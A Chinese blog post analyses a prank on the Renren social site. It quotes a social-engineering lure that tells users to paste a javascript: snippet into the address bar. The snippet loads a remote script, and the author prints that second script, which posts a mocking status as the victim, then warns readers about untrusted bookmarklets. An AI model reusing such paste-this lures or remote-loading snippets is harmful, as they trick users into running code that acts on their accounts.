传说中的“我是2B青年”

好像很多人中招了(虽然我一个也没见到)，于是就想把这个代码弄出来看看。

让人中招的原文如下：

据说校内网使用数据挖掘技术，根据用户的行为对用户的类型进行进行了分类，比如“美女”“单身”“有思想”“搓男”等等。

本来这些东西是不能让用户看到的，现在泄漏出来一段代码， 可以看到校内对你的评价：

javascript:var%20s%20=%20document.createElement(‘script’);

document.body.appendChild(s);

s.src=’http://commondatastorage.googleapis.com/tecent/homepage’;

void(0);

操作方法：

1、复制上面的代码

2、进入你的校内“首页”

3、将浏览器地址栏中的内容替换为你复制的代码

4、回车！

稍等片刻，奇迹发生！

单看那段js代码，就是从网上请求了另一段js代码，这种方式跟google reader中的分享书签、搜狗云输入法的那个js书签、twitter的分享书签用的方法其实是一样的，区别在于那些js代码的发布人是可以信任的，虽然用了很多代码混淆的方式让人看不懂。实际上这种方法很不安全，不信任的代码可以做很多坏事。

google reader中js书签

google reader 分享书签点击的效果

搜狗云输入法的书签

twitter的那个js书签在新版界面上一时没能找到，也许是被官方删掉了，也许单纯只是我没找到而已，但却发现Tumblr也有类似的一个js书签。

tumblr中的分享书签

这种利用js方式可以做很多有益或者有害的事情。有害有益程度纯粹看那段js代码是用于做什么的。

将从网上请求下来的第二段js贴在下面：

var ss= document.createElement(‘script’);

ss.type=’text/javascript’;

ss.text=”function xss(){

document.getElementById(‘publisher_statusInput’).value=’我是2B青年’;

document.getElementById(‘publisher_submit’).click();

return false;

}”;

document.body.appendChild(ss);
//publisher_statusInput

//publisher_submitxss();

于是这段代码的作用就很简单很明显了，也没做其他啥特别恶劣的事情，就是找到首页的状态发布栏，填入了一个“我是2B青年”的状态，然后提交发布。还好这纯粹是个小小的恶作剧。。。

最后告诫中招的童鞋们，网上要注意安全。